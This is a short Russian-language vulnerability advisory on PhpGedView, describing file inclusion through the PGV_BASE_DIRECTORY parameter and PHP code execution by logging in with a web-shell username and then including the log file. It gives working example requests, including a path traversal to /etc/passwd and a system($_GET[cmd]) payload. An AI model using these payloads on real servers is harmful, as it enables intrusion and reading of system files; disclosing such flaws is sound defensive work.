PHP инклюдинг в PhpGedView

Описание:
Обнаруженные Уязвимости позволяют удаленному пользователю получить доступ к важным данным и выполнить произвольный PHP сценарий на системе.

1. Отсутствует фильтрация входных данных в параметре "PGV_BASE_DIRECTORY" в сценарии "help_text_vars.php". Удаленный пользователь может подключить произвольные файлы на системе. Удачная эксплуатация уязвимости возможна при включено опции "register_globals". Пример:

http://[target]/[path]/help_text_vars.php?
PGV_BASE_DIRECTORY=../../../../../../../etc/passwd 2. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "user_language", "user_email" и "user_gedcomid" в сценарии "authenticate.php". Удаленный пользователь может выполнить произвольный PHP код на системе. Для удачной эксплуатации уязвимости требуется, чтобы опция "magic_quotes_gpc" была отключена. Пример:

Пытаемся войти в систему таким образом:
username: <?php system($_GET[cmd]);?>
password: [nothing]

Затем:
http://[target]/[path]/help_text_vars.php?cmd=ls%20-la&
PGV_BASE_DIRECTORY=./index/pgv-200512.log

URL производителя: phpgedview.sourceforge.net

Решение: Установите исправление с сайта производителя.

Источник: